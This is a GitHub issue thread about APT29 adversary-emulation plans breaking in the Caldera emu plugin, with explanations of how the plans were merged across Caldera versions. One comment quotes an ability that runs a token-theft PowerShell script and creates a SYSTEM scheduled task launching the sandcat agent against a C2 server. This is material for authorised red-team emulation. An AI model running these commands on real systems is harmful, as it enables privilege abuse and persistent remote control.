APT29 Plugin execution errors #18
Comments
|
I am not execute the first step of APT29 profile getting below:
|
Can you show me what facts config you have done for APT29 ? |
|
Hello, I think I can shed some lights on the issues you are encountering. To my knowledge, as of now, the apt29 execution from https://github.com/center-for-threat-informed-defense/adversary_emulation_library is broken for multiple reasons 💔 . I won't list all of them here as it might make this message lengthy and hard to read 🧾 . The issue you are referencing is linked to this issue The gist of it is that in mitre-attack/attack-arsenal from caldera v2.6.6 ( the previous caldera ) there were 3 plans for apt29 scenarios :
All other plans were APT3 related :
Those plan got all merged together in caldera 3.0 in a single emulation plan yaml file. The confusion seems to stem from the fact that they used to be all in a same folder named This change happened when it got migrated from mitre-attack/attack-arsenal to center-for-threat-informed-defense/adversary_emulation_library. The old plans are also visible in the archive folder. The ability you are referencing is not an apt29 original ability but an apt3 one : - id: 03afada1-1714-408f-bde5-f528b91dc89d
name: >-
5.B.1 - Access Token Manipulation (T1134),
6.A.1 - Query Registry (T1012),
7.B.1 - Remote File Copy (T1105),
7.C.1 - Scheduled Tasks (T1053),
8.A.1/2 - File and Directory Discovery (T1083)
description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process.
tactic: defensive-evasion
technique:
attack_id: T1134
name: Access Token Manipulation (T1134)
platforms:
windows:
psh,pwsh:
command: |
Import-Module .\StealToken.ps1 -Verbose -Force;
StealToken;
CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"';
CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM';
CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}';
CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';
RevertToSelf;
payload: StealToken.ps1,sandcat.go-windowsThere is no easy solution. One of them is to execute apt29 from caldera 2.6.6. An other solution is to split the apt29.yml file back into multiple sub plan like in the original caldera DYI. If you go this path you will encounter other problems that did arise because the plans were written for caldera 2 in mind and some abilities broke with caldera 3. Another problem is payload related but won't dwell on it as it is another problem. I have forked center-for-threat-informed-defense/adversary_emulation_library and made some changes and now have a close to operational apt29 execution but I'm waiting for maintainers to comment on the relevant issue before proposing merge request as it involves multiple files changes. |
|
The emu plugin is just converting what exists in the center-for-threat-informed-defense/adversary_emulation_library. This issue would require a change there. I would recommend trying @Thamane's suggestions if you haven't already. If nothing else works, feel free to re-open this issue or start a new one. Thanks! |
The Day 1 part completes but then the Day 2 part never starts and it just stays hug up at that point. Basically after the restart in Day 1 new bots are not created again which leads to the apt29 plugin getting stuck at Artifact cleanup phase after the scheduled task phase. Also is there any documentation on what each of the facts means so that I can verify if I have the correct things where they should be.
Also when using StealToken powershell script in the Access Token Manipulation stage I get these errors:
I think most of the errors that I am getting can be just due to misunderstanding of where which facts should go. Can you please help me understand this part?
The text was updated successfully, but these errors were encountered: